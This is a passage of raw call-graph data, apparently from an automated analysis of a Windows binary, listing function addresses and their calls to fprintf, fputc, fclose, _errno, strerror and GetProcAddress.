30125->30736 30125->30763 30769 70a19ec9 _time64 srand 30125->30769 30775 70a2cd70 2 API calls 30125->30775 30781 70a2c980 10 API calls 30125->30781 30787 70a05f90 107 API calls 30125->30787 30789 70a1b140 free 30125->30789 30790 70a1ab88 free 30125->30790 30791 70a1abc7 _errno 30125->30791 30792 70a0a1f0 55 API calls 30125->30792 30795 70a1ab66 memcpy free 30125->30795 30803 70a2d1e0 30125->30803 30817 70a2cf50 30125->30817 30831 70a2cad0 30125->30831 30845 70a2cc20 30125->30845 30859 70a700f0 30125->30859 30868 70a049d0 30125->30868 30995 70a04200 7 API calls 30125->30995 30126 70a1a66c 30138 70a1b2d0 fprintf 30126->30138 30139 70a1a678 _errno 30126->30139 30127 70a1a332 _errno 30145 70a1c9dd _errno strerror fprintf 30127->30145 30146 70a1a33e fprintf fprintf fputc fclose 30127->30146 30128 70a1c0cb fprintf 30160 70a1c0f4 _errno strerror fprintf 30128->30160 30147 70a1a918 fprintf 30129->30147 30130->30763 30132 70a1a4c4 _errno 30149 70a1be01 _errno strerror fprintf 30132->30149 30150 70a1a4d0 fprintf fprintf fputc fclose 30132->30150 30133->30125 30135->30125 30152 70a196f8 GetProcAddress GetProcAddress 30135->30152 30136 70a1ba48 _errno 30153 70a1ba50 _errno strerror fprintf 30136->30153 30136->30763 30137->30763 30138->30125 30139->30140 30156 70a1a684 fprintf fprintf fputc fclose 30139->30156 30140->30077 30172 70a1bbfd fputc 30141->30172 30142 70a1b3df fprintf 30142->30125 30144 70a1c094 fprintf 30144->30763 30145->30763 30173 70a1a3a2 fprintf 30146->30173 30174 70a1a931 fputc 30147->30174 30176 70a1a47a fputc 30148->30176 30149->30763 30179 70a1a534 fprintf 30150->30179 30151->30075 30152->30125 30164 70a19721 GetProcAddress GetProcAddress 30152->30164 30153->30763 30154 70a1c2d6 fprintf 30154->30125 30155 70a1bf22 _errno 30167 70a1bf2c _errno strerror fprintf 30155->30167 30155->30763 30184 70a1a6e8 fprintf 30156->30184 30157 70a1a749 _errno 30169 70a1a757 fprintf fprintf fputc fclose 30157->30169 30170 70a1c066 _errno strerror fprintf 30157->30170 30158 70a1b3ad fprintf 30185 70a1b3bf fputc 30158->30185 30159 70a1c4ab fprintf 30159->30763 30160->30763 30161 70a1c647 fprintf 30161->30112 30163 70a1aa13 _errno 30162->30163 30198 70a1af0f fprintf 30162->30198 30992 70a04200 7 API calls 30162->30992 30163->30122 30181 70a1aa21 fprintf fputc fclose 30163->30181 30164->30125 30183 70a19751 GetProcAddress 30164->30183 30165 70a1b631 fprintf 30165->30125 30166 70a1ba79 fprintf fprintf fputc fclose 30166->30763 30167->30763 30200 70a1a7bb fprintf 30169->30200 30170->30763 30171 70a1af76 _errno 30186 70a1af80 _errno strerror fprintf 30171->30186 30187 70a1af9b fprintf fprintf fputc fclose 30171->30187 30172->30763 30203 70a1a3bb fputc 30173->30203 30174->30052 30175 70a1b8c7 fprintf 30175->30763 30176->30125 30177 70a1c609 fprintf 30177->30763 30178 70a1c19f _errno 30191 70a1c1c1 fprintf fprintf fputc fclose 30178->30191 30192 70a1c1a6 _errno strerror fprintf 30178->30192 30209 70a1a54d fputc 30179->30209 30211 70a1aa6d fputc 30181->30211 30182 70a1b1d4 _errno 30193 70a1b1e0 fprintf fprintf fputc fclose 30182->30193 30194 70a1c426 _errno strerror fprintf 30182->30194 30183->30125 30195 70a1976d GetProcAddress 30183->30195 30214 70a1a701 fputc 30184->30214 30185->30125 30186->30187 30215 70a1afff fprintf 30187->30215 30188 70a1c454 fprintf 30188->30763 30189 70a1bcab fprintf 30189->30763 30190 70a1ca0b fprintf 30190->30763 30219 70a1c225 fprintf 30191->30219 30192->30191 30222 70a1b244 fprintf 30193->30222 30194->30763 30195->30125 30212 70a19789 GetProcAddress 30195->30212 30196 70a1ab1d fprintf 30224 70a1ab2f fputc 30196->30224 30197 70a1b6ee fprintf 30197->30125 30198->30125 30199->30051 30261 70a1c907 30199->30261 30226 70a1a7d4 fputc 30200->30226 30201 70a04200 7 API calls 30201->30763 30202 70a1bc54 fprintf 30202->30119 30203->30052 30204 70a1c122 fprintf 30204->30100 30205 70a1b116 _errno 30216 70a1c3cf _errno strerror fprintf 30205->30216 30205->30763 30206 70a1b517 _errno 30217 70a1b521 _errno strerror fprintf 30206->30217 30218 70a1b53c fprintf fprintf fputc fclose 30206->30218 30994 70a06d00 19 API calls 30207->30994 30208 70a1cacb fprintf 30208->30125 30209->30052 30210 70a1be2f fprintf 30210->30763 30211->30051 30212->30125 30223 70a1979e GetProcAddress 30212->30223 30213 70a1bac8 fprintf 30239 70a1bada fputc 30213->30239 30214->30052 30243 70a1b018 fputc 30215->30243 30216->30763 30217->30218 30248 70a1b5a0 fprintf 30218->30248 30251 70a1c23e fputc 30219->30251 30221 70a1c6dd _errno 30236 70a1c706 fprintf fprintf fputc fclose 30221->30236 30237 70a1c6eb _errno strerror fprintf 30221->30237 30252 70a1b25d fputc 30222->30252 30223->30125 30238 70a197b3 GetProcAddress 30223->30238 30224->30125 30225 70a1aedd fprintf 30256 70a1aeef fputc 30225->30256 30226->30052 30227 70a1b7c0 _errno 30244 70a1ca4d _errno strerror fprintf 30227->30244 30245 70a1b7cc fprintf fprintf fputc fclose 30227->30245 30228 70a1bc1d fprintf 30228->30763 30229 70a1b444 _errno 30246 70a1b453 _errno strerror fprintf 30229->30246 30229->30763 30230 70a1bce2 fprintf 30230->30763 30231 70a1b8fe fprintf 30231->30763 30232 70a1aace fprintf fprintf fputc fclose 30232->30763 30233 70a1b95b _errno 30249 70a1b985 fprintf fprintf fputc fclose 30233->30249 30250 70a1b96a _errno strerror fprintf 30233->30250 30234->30125 30235 70a1c29f fprintf 30235->30763 30268 70a1c766 fprintf 30236->30268 30237->30236 30238->30125 30253 70a197cf GetProcAddress 30238->30253 30239->30125 30240 70a1c335 _errno 30254 70a1c340 fprintf fprintf fputc fclose 30240->30254 30255 70a1d14b _errno strerror fprintf 30240->30255 30241 70a1cc63 _errno 30258 70a1cc75 fprintf fprintf fputc fclose 30241->30258 30259 70a1d70f _errno strerror fprintf 30241->30259 30243->30052 30244->30763 30273 70a1b830 fprintf 30245->30273 30246->30763 30247 70a1bd3f _errno 30263 70a1bd52 fprintf fprintf fputc fclose 30247->30263 30264 70a1ccf6 _errno strerror fprintf 30247->30264 30274 70a1b5b9 fputc 30248->30274 30275 70a1b9e9 fprintf 30249->30275 30250->30249 30251->30052 30252->30052 30253->30125 30269 70a197e4 GetProcAddress 30253->30269 30277 70a1c3a4 fprintf 30254->30277 30255->30763 30256->30082 30257 70a1b344 _errno 30257->30133 30257->30763 30281 70a1ccd2 fprintf 30258->30281 30285 70a1d72f _errno strerror fprintf 30259->30285 30260 70a1c3fd fprintf 30260->30194 30996 70a04200 7 API calls 30261->30996 30262 70a1cd24 fprintf 30284 70a1cd4d _errno strerror fprintf 30262->30284 30286 70a1bdb6 fprintf 30263->30286 30264->30763 30265 70a1ad9e 30265->30051 30266 70a1c044 fprintf 30266->30763 30267 70a1cb34 fprintf 30267->30763 30289 70a1c77d fputc 30268->30289 30269->30125 30276 70a19800 GetProcAddress 30269->30276 30270 70a1bf8e _errno 30279 70a1bf99 fprintf fprintf fputc fclose 30270->30279 30280 70a1cdbd _errno strerror fprintf 30270->30280 30271 70a1d179 fprintf 30271->30763 30294 70a1b849 fputc 30273->30294 30274->30052 30296 70a1ba02 fputc 30275->30296 30276->30125 30290 70a19815 GetProcAddress 30276->30290 30300 70a1c3bd fputc 30277->30300 30278 70a1c884 fprintf 30278->30125 30301 70a1bffd fprintf 30279->30301 30280->30763 30302 70a1cce4 fputc 30281->30302 30282 70a1b754 _errno 30291 70a1b75e _errno strerror fprintf 30282->30291 30282->30763 30283 70a1c91a 30292 70a1c926 _errno 30283->30292 30293 70a1c9a9 fprintf 30283->30293 30284->30763 30295 70a1d74f GetProcAddress 30285->30295 30307 70a1bdcf fputc 30286->30307 30287 70a1ca7b fprintf 30287->30125 30288 70a1cf6f _errno 30297 70a1cf81 fprintf fprintf fputc fclose 30288->30297 30298 70a1d77a _errno strerror fprintf 30288->30298 30289->30051 30290->30125 30299 70a19831 GetProcAddress 30290->30299 30291->30763 30303 70a1c930 _errno strerror fprintf 30292->30303 30304 70a1c94b fprintf fputc fclose 30292->30304 30310 70a1c98b fputc 30293->30310 30294->30052 30295->30125 30295->30763 30296->30052 30315 70a1cfe5 fprintf 30297->30315 30298->30763 30299->30125 30308 70a1984d GetProcAddress 30299->30308 30300->30052 30320 70a1c016 fputc 30301->30320 30302->30264 30303->30304 30304->30310 30305 70a1c50a _errno 30311 70a1c511 _errno strerror fprintf 30305->30311 30312 70a1c52c fprintf fprintf fputc fclose 30305->30312 30306 70a1d7a8 fprintf 30306->30125 30307->30052 30308->30125 30317 70a19862 GetProcAddress 30308->30317 30309 70a1c7c5 _errno 30318 70a1c7e7 fprintf fprintf fputc fclose 30309->30318 30319 70a1c7cc _errno strerror fprintf 30309->30319 30310->30051 30311->30312 30330 70a1c590 fprintf 30312->30330 30314 70a1cdeb fprintf 30314->30763 30334 70a1cffe fputc 30315->30334 30316 70a1cba3 _errno 30324 70a1cbb5 fprintf fprintf fputc fclose 30316->30324 30325 70a1f6cf _errno strerror fprintf 30316->30325 30317->30125 30326 70a1987e GetProcAddress 30317->30326 30336 70a1c84b fprintf 30318->30336 30319->30318 30320->30052 30321 70a1d1c8 _errno 30327 70a1d37b _errno strerror fprintf 30321->30327 30328 70a1d1da fprintf fprintf fputc fclose 30321->30328 30322 70a1cd7b fprintf 30322->30125 30323 70a1ce33 _errno 30323->30285 30331 70a1ce45 fprintf fprintf fputc fclose 30323->30331 30339 70a1cc19 fprintf 30324->30339 30325->30763 30326->30125 30335 70a1989a GetProcAddress 30326->30335 30327->30763 30342 70a1d23e fprintf 30328->30342 30337 70a1c5a9 fputc 30330->30337 30331->30763 30332 70a1cee2 fprintf 30332->30763 30333 70a1d3a9 fprintf 30333->30763 30334->30052 30335->30125 30340 70a198b6 GetProcAddress 30335->30340 30345 70a1c864 fputc 30336->30345 30337->30052 30338 70a1cf20 fprintf 30338->30763 30352 70a1cc32 fputc 30339->30352 30340->30125 30344 70a198d2 GetProcAddress 30340->30344 30341 70a1da28 _errno 30346 70a1da51 fprintf fprintf fputc fclose 30341->30346 30347 70a1da36 _errno strerror fprintf 30341->30347 30355 70a1d257 fputc 30342->30355 30343 70a1d02f _errno 30350 70a1d058 fprintf fprintf fputc fclose 30343->30350 30351 70a1d03d _errno strerror fprintf 30343->30351 30344->30125 30353 70a198ee GetProcAddress 30344->30353 30345->30052 30346->30763 30347->30346 30348 70a1d288 _errno 30356 70a1d2b1 fprintf fprintf fputc fclose 30348->30356 30357 70a1d296 _errno strerror fprintf 30348->30357 30349 70a1cea9 fprintf 30363 70a1cec2 fputc 30349->30363 30365 70a1d0bc fprintf 30350->30365 30351->30350 30352->30052 30353->30125 30359 70a1990a GetProcAddress 30353->30359 30354 70a1daee fprintf 30354->30763 30355->30052 30356->30763 30357->30356 30358 70a1d50a _errno 30366 70a1d533 fprintf fprintf fputc fclose 30358->30366 30367 70a1d518 _errno strerror fprintf 30358->30367 30359->30125 30368 70a19926 GetProcAddress 30359->30368 30360 70a1f649 fprintf 30360->30763 30361 70a1f70e _errno 30370 70a1f737 fprintf fprintf fputc fclose 30361->30370 30371 70a1f71c _errno strerror fprintf 30361->30371 30362 70a1d34e fprintf 30362->30763 30363->30052 30364 70a1d3f8 _errno 30372 70a1d421 fprintf fprintf fputc fclose 30364->30372 30373 70a1d406 _errno strerror fprintf 30364->30373 30380 70a1d0d5 fputc 30365->30380 30366->30763 30367->30366 30368->30125 30374 70a1993b GetProcAddress 30368->30374 30369 70a1dab5 fprintf 30382 70a1dace fputc 30369->30382 30370->30763 30371->30370 30372->30763 30373->30372 30374->30125 30381 70a19957 GetProcAddress 30374->30381 30375 70a1d5d0 fprintf 30375->30763 30376 70a1d61c _errno 30384 70a1d645 fprintf fprintf fputc fclose 30376->30384 30385 70a1d62a _errno strerror fprintf 30376->30385 30377 70a1f7d4 fprintf 30377->30763 30378 70a1d315 fprintf 30393 70a1d32e fputc 30378->30393 30379 70a1d4be fprintf 30379->30763 30380->30052 30381->30125 30388 70a1996c GetProcAddress 30381->30388 30382->30052 30383 70a1fbb2 _errno 30389 70a1fbc0 _errno strerror fprintf 30383->30389 30390 70a1fbdb fprintf fprintf fputc fclose 30383->30390 30384->30763 30385->30384 30386 70a1faa0 _errno 30396 70a1fac9 fprintf fprintf fputc fclose 30386->30396 30397 70a1faae _errno strerror fprintf 30386->30397 30387 70a1d597 fprintf 30403 70a1d5b0 fputc 30387->30403 30388->30125 30398 70a19981 GetProcAddress 30388->30398 30389->30390 30390->30763 30391 70a1f79b fprintf 30407 70a1f7b4 fputc 30391->30407 30392 70a1d6e2 fprintf 30392->30763 30393->30052 30394 70a1f960 _errno 30401 70a1f989 fprintf fprintf fputc fclose 30394->30401 30402 70a1f96e _errno strerror fprintf 30394->30402 30395 70a1d485 fprintf 30411 70a1d49e fputc 30395->30411 30396->30763 30397->30396 30398->30125 30404 70a1999d GetProcAddress 30398->30404 30399 70a1fc78 fprintf 30399->30763 30400 70a1f84e _errno 30408 70a1f877 fprintf fprintf fputc fclose 30400->30408 30409 70a1f85c _errno strerror fprintf 30400->30409 30401->30763 30402->30401 30403->30052 30404->30125 30412 70a199b9 GetProcAddress 30404->30412 30405 70a1fb66 fprintf 30405->30763 30406 70a1d6a9 fprintf 30421 70a1d6c2 fputc 30406->30421 30407->30052 30408->30763 30409->30408 30410 70a1fa26 fprintf 30410->30763 30411->30052 30412->30125 30418 70a199d5 GetProcAddress 30412->30418 30413 70a204fa _errno 30419 70a20523 fprintf fprintf fputc fclose 30413->30419 30420 70a20508 _errno strerror fprintf 30413->30420 30414 70a1fc3f fprintf 30427 70a1fc58 fputc 30414->30427 30415 70a1f914 fprintf 30415->30763 30416 70a203e8 _errno 30424 70a20411 fprintf fprintf fputc fclose 30416->30424 30425 70a203f6 _errno strerror fprintf 30416->30425 30417 70a1fb2d fprintf 30433 70a1fb46 fputc 30417->30433 30418->30125 30426 70a199f1 GetProcAddress 30418->30426 30419->30763 30420->30419 30421->30052 30422 70a202a8 _errno 30431 70a202d1 fprintf fprintf fputc fclose 30422->30431 30432 70a202b6 _errno strerror fprintf 30422->30432 30423 70a1f9ed fprintf 30438 70a1fa06 fputc 30423->30438 30424->30763 30425->30424 30426->30125 30435 70a19a0d GetProcAddress 30426->30435 30427->30052 30428 70a205c0 fprintf 30428->30763 30429 70a20196 _errno 30436 70a201a4 _errno strerror fprintf 30429->30436 30437 70a201bf fprintf fprintf fputc fclose 30429->30437 30430 70a1f8db fprintf 30443 70a1f8f4 fputc 30430->30443 30431->30763 30432->30431 30433->30052 30434 70a204ae fprintf 30434->30763 30435->30125 30440 70a19a29 GetProcAddress 30435->30440 30436->30437 30437->30763 30438->30052 30439 70a2036e fprintf 30439->30763 30440->30125 30447 70a19a45 GetProcAddress 30440->30447 30441 70a20056 _errno 30448 70a20064 _errno strerror fprintf 30441->30448 30449 70a2007f fprintf fprintf fputc fclose 30441->30449 30442 70a20587 fprintf 30455 70a205a0 fputc 30442->30455 30443->30052 30444 70a2025c fprintf 30444->30763 30445 70a1ff44 _errno 30452 70a1ff52 _errno strerror fprintf 30445->30452 30453 70a1ff6d fprintf fprintf fputc fclose 30445->30453 30446 70a20475 fprintf 30461 70a2048e fputc 30446->30461 30447->30125 30454 70a19a61 GetProcAddress 30447->30454 30448->30449 30449->30763 30450 70a1fe04 _errno 30459 70a1fe12 _errno strerror fprintf 30450->30459 30460 70a1fe2d fprintf fprintf fputc fclose 30450->30460 30451 70a20335 fprintf 30466 70a2034e fputc 30451->30466 30452->30453 30453->30763 30454->30125 30463 70a19a76 GetProcAddress 30454->30463 30455->30052 30456 70a2011c fprintf 30456->30763 30457 70a1fcf2 _errno 30464 70a1fd00 _errno strerror fprintf 30457->30464 30465 70a1fd1b fprintf fprintf fputc fclose 30457->30465 30458 70a20223 fprintf 30471 70a2023c fputc 30458->30471 30459->30460 30460->30763 30461->30052 30462 70a2000a fprintf 30462->30763 30463->30125 30469 70a19a92 GetProcAddress 30463->30469 30464->30465 30465->30763 30466->30052 30467 70a1feca fprintf 30467->30763 30468 70a2178a _errno 30475 70a217b3 fprintf fprintf fputc fclose 30468->30475 30476 70a21798 _errno strerror fprintf 30468->30476 30469->30125 30477 70a19aae GetProcAddress 30469->30477 30470 70a200e3 fprintf 30483 70a200fc fputc 30470->30483 30471->30052 30472 70a1fdb8 fprintf 30472->30763 30473 70a21678 _errno 30480 70a216a1 fprintf fprintf fputc fclose 30473->30480 30481 70a21686 _errno strerror fprintf 30473->30481 30474 70a1ffd1 fprintf 30489 70a1ffea fputc 30474->30489 30475->30763 30476->30475 30477->30125 30482 70a19aca GetProcAddress 30477->30482 30478 70a21538 _errno 30487 70a21561 fprintf fprintf fputc fclose 30478->30487 30488 70a21546 _errno strerror fprintf 30478->30488 30479 70a1fe91 fprintf 30494 70a1feaa fputc 30479->30494 30480->30763 30481->30480 30482->30125 30491 70a19ae6 GetProcAddress 30482->30491 30483->30052 30484 70a21850 fprintf 30484->30763 30485 70a21426 _errno 30492 70a21434 _errno strerror fprintf 30485->30492 30493 70a2144f fprintf fprintf fputc fclose 30485->30493 30486 70a1fd7f fprintf 30499 70a1fd98 fputc 30486->30499 30487->30763 30488->30487 30489->30052 30490 70a2173e fprintf 30490->30763 30491->30125 30498 70a19b02 GetProcAddress 30491->30498 30492->30493 30493->30763 30494->30052 30495 70a215fe fprintf 30495->30763 30496 70a212e6 _errno 30503 70a212f4 _errno strerror fprintf 30496->30503 30504 70a2130f fprintf fprintf fputc fclose 30496->30504 30497 70a21817 fprintf 30510 70a21830 fputc 30497->30510 30498->30125 30505 70a19b1e GetProcAddress 30498->30505 30499->30052 30500 70a214ec fprintf 30500->30763 30501 70a211d4 _errno 30508 70a211e2 _errno strerror fprintf 30501->30508 30509 70a211fd fprintf fprintf fputc fclose 30501->30509 30502 70a21705 fprintf 30517 70a2171e fputc 30502->30517 30503->30504 30504->30763 30505->30125 30511 70a19b33 GetProcAddress 30505->30511 30506 70a21094 _errno 30515 70a210a2 _errno strerror fprintf 30506->30515 30516 70a210bd fprintf fprintf fputc fclose 30506->30516 30507 70a215c5 fprintf 30522 70a215de fputc 30507->30522 30508->30509 30509->30763 30510->30052 30511->30125 30519 70a19b48 GetProcAddress 30511->30519 30512 70a213ac fprintf 30512->30763 30513 70a20f82 _errno 30520 70a20f90 _errno strerror fprintf 30513->30520 30521 70a20fab fprintf fprintf fputc fclose 30513->30521 30514 70a214b3 fprintf 30527 70a214cc fputc 30514->30527 30515->30516 30516->30763 30517->30052 30518 70a2129a fprintf 30518->30763 30519->30125 30526 70a19b64 GetProcAddress 30519->30526 30520->30521 30521->30763 30522->30052 30523 70a2115a fprintf 30523->30763 30524 70a20e42 _errno 30531 70a20e50 _errno strerror fprintf 30524->30531 30532 70a20e6b fprintf fprintf fputc fclose 30524->30532 30525 70a21373 fprintf 30538 70a2138c fputc 30525->30538 30526->30125 30533 70a19b80 GetProcAddress 30526->30533 30527->30052 30528 70a21048 fprintf 30528->30763 30529 70a20d30 _errno 30536 70a20d59 fprintf fprintf fputc fclose 30529->30536 30537 70a20d3e _errno strerror fprintf 30529->30537 30530 70a21261 fprintf 30546 70a2127a fputc 30530->30546 30531->30532 30532->30763 30533->30125 30540 70a19b9c GetProcAddress 30533->30540 30534 70a20bf0 _errno 30544 70a20c19 fprintf fprintf fputc fclose 30534->30544 30545 70a20bfe _errno strerror fprintf 30534->30545 30535 70a21121 fprintf 30551 70a2113a fputc 30535->30551 30536->30763 30537->30536 30538->30052 30539 70a20f08 fprintf 30539->30763 30540->30125 30541 70a19bb8 GetProcAddress 30540->30541 30541->30125 30548 70a19bcd GetProcAddress 30541->30548 30542 70a20ade _errno 30549 70a20b07 fprintf fprintf fputc fclose 30542->30549 30550 70a20aec _errno strerror fprintf 30542->30550 30543 70a2100f fprintf 30556 70a21028 fputc 30543->30556 30544->30763 30545->30544 30546->30052 30547 70a20df6 fprintf 30547->30763 30548->30125 30555 70a19be9 GetProcAddress 30548->30555 30549->30763 30550->30549 30551->30052 30552 70a20cb6 fprintf 30552->30763 30553 70a2099e _errno 30560 70a209c7 fprintf fprintf fputc fclose 30553->30560 30561 70a209ac _errno strerror fprintf 30553->30561 30554 70a20ecf fprintf 30567 70a20ee8 fputc 30554->30567 30555->30125 30562 70a19c05 GetProcAddress 30555->30562 30556->30052 30557 70a20ba4 fprintf 30557->30763 30558 70a2088c _errno 30565 70a208b5 fprintf fprintf fputc fclose 30558->30565 30566 70a2089a _errno strerror fprintf 30558->30566 30559 70a20dbd fprintf 30574 70a20dd6 fputc 30559->30574 30560->30763 30561->30560 30562->30125 30569 70a19c1a GetProcAddress 30562->30569 30563 70a2074c _errno 30572 70a20775 fprintf fprintf fputc fclose 30563->30572 30573 70a2075a _errno strerror fprintf 30563->30573 30564 70a20c7d fprintf 30579 70a20c96 fputc 30564->30579 30565->30763 30566->30565 30567->30052 30568 70a20a64 fprintf 30568->30763 30569->30125 30576 70a19c36 GetProcAddress 30569->30576 30570 70a2063a _errno 30577 70a20663 fprintf fprintf fputc fclose 30570->30577 30578 70a20648 _errno strerror fprintf 30570->30578 30571 70a20b6b fprintf 30584 70a20b84 fputc 30571->30584 30572->30763 30573->30572 30574->30052 30575 70a20952 fprintf 30575->30763 30576->30125 30583 70a19c52 GetProcAddress 30576->30583 30577->30763 30578->30577 30579->30052 30580 70a1f548 _errno 30587 70a1f571 fprintf fprintf fputc fclose 30580->30587 30588 70a1f556 _errno strerror fprintf 30580->30588 30581 70a20812 fprintf 30581->30763 30582 70a20a2b fprintf 30595 70a20a44 fputc 30582->30595 30583->30125 30590 70a19c6e GetProcAddress 30583->30590 30584->30052 30585 70a1f436 _errno 30591 70a1f444 _errno strerror fprintf 30585->30591 30592 70a1f45f fprintf fprintf fputc fclose 30585->30592 30586 70a20700 fprintf 30586->30763 30587->30763 30588->30587 30589 70a20919 fprintf 30600 70a20932 fputc 30589->30600 30590->30125 30597 70a19c8a GetProcAddress 30590->30597 30591->30592 30592->30763 30593 70a207d9 fprintf 30606 70a207f2 fputc 30593->30606 30594 70a1f60e fprintf 30594->30763 30595->30052 30596 70a1f2f6 _errno 30602 70a1f304 _errno strerror fprintf 30596->30602 30603 70a1f31f fprintf fprintf fputc fclose 30596->30603 30597->30125 30605 70a19c9f GetProcAddress 30597->30605 30598 70a206c7 fprintf 30612 70a206e0 fputc 30598->30612 30599 70a1f4fc fprintf 30599->30763 30600->30052 30601 70a1f1e4 _errno 30609 70a1f1f2 _errno strerror fprintf 30601->30609 30610 70a1f20d fprintf fprintf fputc fclose 30601->30610 30602->30603 30603->30763 30604 70a1f3bc fprintf 30604->30763 30605->30125 30611 70a19cbb GetProcAddress 30605->30611 30606->30052 30607 70a1f0a4 _errno 30615 70a1f0b2 _errno strerror fprintf 30607->30615 30616 70a1f0cd fprintf fprintf fputc fclose 30607->30616 30608 70a1f5d5 fprintf 30621 70a1f5ee fputc 30608->30621 30609->30610 30610->30763 30611->30125 30618 70a19cd7 GetProcAddress 30611->30618 30612->30052 30613 70a1ef92 _errno 30619 70a1efa0 _errno strerror fprintf 30613->30619 30620 70a1efbb fprintf fprintf fputc fclose 30613->30620 30614 70a1f4c3 fprintf 30626 70a1f4dc fputc 30614->30626 30615->30616 30616->30763 30617 70a1f2aa fprintf 30617->30763 30618->30125 30625 70a19cec GetProcAddress 30618->30625 30619->30620 30620->30763 30621->30052 30622 70a1f16a fprintf 30622->30763 30623 70a1ee52 _errno 30630 70a1ee60 _errno strerror fprintf 30623->30630 30631 70a1ee7b fprintf fprintf fputc fclose 30623->30631 30624 70a1f383 fprintf 30632 70a1f39c fputc 30624->30632 30625->30125 30634 70a19d08 GetProcAddress 30625->30634 30626->30052 30627 70a1f058 fprintf 30627->30763 30628 70a1ed40 _errno 30637 70a1ed69 fprintf fprintf fputc fclose 30628->30637 30638 70a1ed4e _errno strerror fprintf 30628->30638 30629 70a1f271 fprintf 30644 70a1f28a fputc 30629->30644 30630->30631 30631->30763 30632->30052 30633 70a1ef18 fprintf 30633->30763 30634->30125 30640 70a19d24 GetProcAddress 30634->30640 30635 70a1ec00 _errno 30642 70a1ec29 fprintf fprintf fputc fclose 30635->30642 30643 70a1ec0e _errno strerror fprintf 30635->30643 30636 70a1f131 fprintf 30649 70a1f14a fputc 30636->30649 30637->30763 30638->30637 30639 70a1eaee _errno 30646 70a1eb17 fprintf fprintf fputc fclose 30639->30646 30647 70a1eafc _errno strerror fprintf 30639->30647 30640->30125 30648 70a19d40 GetProcAddress 30640->30648 30641 70a1f01f fprintf 30654 70a1f038 fputc 30641->30654 30642->30763 30643->30642 30644->30052 30645 70a1ee06 fprintf 30645->30763 30646->30763 30647->30646 30648->30125 30653 70a19d55 GetProcAddress 30648->30653 30649->30052 30650 70a1ecc6 fprintf 30650->30763 30651 70a1e9ae _errno 30658 70a1e9d7 fprintf fprintf fputc fclose 30651->30658 30659 70a1e9bc _errno strerror fprintf 30651->30659 30652 70a1eedf fprintf 30660 70a1eef8 fputc 30652->30660 30662 70a19d71 GetProcAddress 30653->30662 30663 70a1d9d4 GetProcAddress 30653->30663 30654->30052 30655 70a1ebb4 fprintf 30655->30763 30656 70a1e89c _errno 30666 70a1e8c5 fprintf fprintf fputc fclose 30656->30666 30667 70a1e8aa _errno strerror fprintf 30656->30667 30657 70a1edcd fprintf 30674 70a1ede6 fputc 30657->30674 30658->30763 30659->30658 30660->30052 30661 70a1ea74 fprintf 30661->30763 30670 70a1d8e4 GetProcAddress 30662->30670 30671 70a19d8d GetProcAddress 30662->30671 30663->30662 30663->30763 30664 70a1e75c _errno 30672 70a1e785 fprintf fprintf fputc fclose 30664->30672 30673 70a1e76a _errno strerror fprintf 30664->30673 30665 70a1ec8d fprintf 30680 70a1eca6 fputc 30665->30680 30666->30763 30667->30666 30668 70a1e64a _errno 30676 70a1e673 fprintf fprintf fputc fclose 30668->30676 30677 70a1e658 _errno strerror fprintf 30668->30677 30669 70a1eb7b fprintf 30684 70a1eb94 fputc 30669->30684 30670->30671 30670->30763 30678 70a19da9 GetProcAddress 30671->30678 30679 70a1d96a GetProcAddress 30671->30679 30672->30763 30673->30672 30674->30052 30675 70a1e962 fprintf 30675->30763 30676->30763 30677->30676 30685 70a19dc5 GetProcAddress 30678->30685 30686 70a1d85e GetProcAddress 30678->30686 30679->30678 30679->30763 30680->30052 30681 70a1e822 fprintf 30681->30763 30682 70a1e50a _errno 30690 70a1e533 fprintf fprintf fputc fclose 30682->30690 30691 70a1e518 _errno strerror fprintf 30682->30691 30683 70a1ea3b fprintf 30692 70a1ea54 fputc 30683->30692 30684->30052 30694 70a19de1 GetProcAddress 30685->30694 30695 70a1d99f GetProcAddress 30685->30695 30686->30685 30686->30763 30687 70a1e710 fprintf 30687->30763 30688 70a1e3f8 _errno 30697 70a1e421 fprintf fprintf fputc fclose 30688->30697 30698 70a1e406 _errno strerror fprintf 30688->30698 30689 70a1e929 fprintf 30703 70a1e942 fputc 30689->30703 30690->30763 30691->30690 30692->30052 30693 70a1e5d0 fprintf 30693->30763 30700 70a1d893 GetProcAddress 30694->30700 30701 70a19dfd GetProcAddress 30694->30701 30695->30694 30695->30763 30696 70a1e7e9 fprintf 30711 70a1e802 fputc 30696->30711 30697->30763 30698->30697 30699 70a1e6d7 fprintf 30715 70a1e6f0 fputc 30699->30715 30700->30701 30706 70a1d8af GetProcAddress 30700->30706 30707 70a1d919 GetProcAddress 30701->30707 30708 70a19e19 GetProcAddress 30701->30708 30702 70a1e2b8 _errno 30709 70a1e2e1 fprintf fprintf fputc fclose 30702->30709 30710 70a1e2c6 _errno strerror fprintf 30702->30710 30703->30052 30704 70a1e4be fprintf 30704->30763 30705 70a1e1a6 _errno 30713 70a1e1b4 _errno strerror fprintf 30705->30713 30714 70a1e1cf fprintf fprintf fputc fclose 30705->30714 30706->30701 30706->30763 30707->30708 30718 70a1d935 GetProcAddress 30707->30718 30716 70a1d7f1 GetProcAddress 30708->30716 30717 70a19e35 GetProcAddress 30708->30717 30709->30763 30710->30709 30711->30052 30712 70a1e597 fprintf 30722 70a1e5b0 fputc 30712->30722 30713->30714 30714->30763 30715->30052 30716->30717 30723 70a1d80d GetProcAddress 30716->30723 30717->30125 30717->30295 30718->30708 30718->30763 30719 70a1e37e fprintf 30719->30763 30720 70a1e485 fprintf 30734 70a1e49e fputc 30720->30734 30721 70a1e094 _errno 30726 70a1e0a2 _errno strerror fprintf 30721->30726 30727 70a1e0bd fprintf fprintf fputc fclose 30721->30727 30722->30052 30723->30717 30729 70a1d829 GetProcAddress 30723->30729 30724 70a1e26c fprintf 30724->30763 30725 70a1df82 _errno 30732 70a1df90 _errno strerror fprintf 30725->30732 30733 70a1dfab fprintf fprintf fputc fclose 30725->30733 30726->30727 30727->30763 30728 70a1e15a fprintf 30728->30763 30729->30717 30729->30763 30730 70a1e345 fprintf 30742 70a1e35e fputc 30730->30742 30731 70a1de70 _errno 30737 70a1de99 fprintf fprintf fputc fclose 30731->30737 30738 70a1de7e _errno strerror fprintf 30731->30738 30732->30733 30733->30763 30734->30052 30735 70a1e233 fprintf 30745 70a1e24c fputc 30735->30745 30736->30125 30736->30763 30737->30763 30738->30737 30739 70a1e048 fprintf 30739->30763 30740 70a1e121 fprintf 30749 70a1e13a fputc 30740->30749 30741 70a1dd5e _errno 30746 70a1dd87 fprintf fprintf fputc fclose 30741->30746 30747 70a1dd6c _errno strerror fprintf 30741->30747 30742->30052 30743 70a1df36 fprintf 30743->30763 